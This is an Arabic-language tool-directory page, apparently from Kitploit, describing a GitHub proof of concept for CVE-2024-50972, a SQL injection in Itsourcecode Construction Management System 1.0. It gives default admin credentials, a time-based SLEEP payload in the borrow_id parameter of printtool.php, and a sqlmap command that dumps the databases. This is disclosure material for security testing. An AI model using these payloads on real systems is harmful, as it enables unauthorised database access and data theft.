Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50972 — إثبات مفهوم لحقن SQL في نظام إدارة الإنشاءات Itsourcecode الإصدار 1.0، مما يوضح الحقن المستند إلى الوقت عبر معلمة borrow_id ويوفر خطوات الاستغلال. | Kitploit
أدوات/GitHubGitHub/akhlak2511/cve-2024-50972
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

إثبات مفهوم لحقن SQL في نظام إدارة الإنشاءات Itsourcecode الإصدار 1.0، مما يوضح الحقن المستند إلى الوقت عبر معلمة borrow_id ويوفر خطوات الاستغلال.

عرض المستودع
16منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50972

الوصف

ثغرة حقن SQL في ملف printtool.php الخاص بـ Itsourcecode Construction Management System 1.0 تسمح للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر معامل borrow_id.

نوع الثغرة

حقن SQL

بائع المنتج

Itsourcecode

قاعدة كود المنتج المتأثر:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

المكون المتأثر:

نظام Itsourcecode لإدارة الإنشاءات الإصدار 1.0 معرض لحقن SQL عبر معامل borrow_id في صفحة printtool.php

نواقل الهجوم:

  1. قم بإعداد التطبيق محليًا، وسجل الدخول ببيانات المسؤول admin:admin
  2. انتقل إلى عنوان URL التالي في متصفحك: http://localhost/monitoring_system/printtool.php?borrow_id=5
  3. حقن حمولة SQL: قم بتعديل معامل borrow_id في عنوان URL ليشمل حمولة حقن SQL تعتمد على الوقت. http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  4. لاحظ استجابة التطبيق: يجب أن يستغرق تحميل الصفحة وقتًا أطول بشكل ملحوظ (20 ثانية) إذا كان الحقن ناجحًا، مما يؤكد أن معامل borrow_id معرض لحقن SQL.
  5. استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي: sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

المرجع:

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
تنزيل الأداة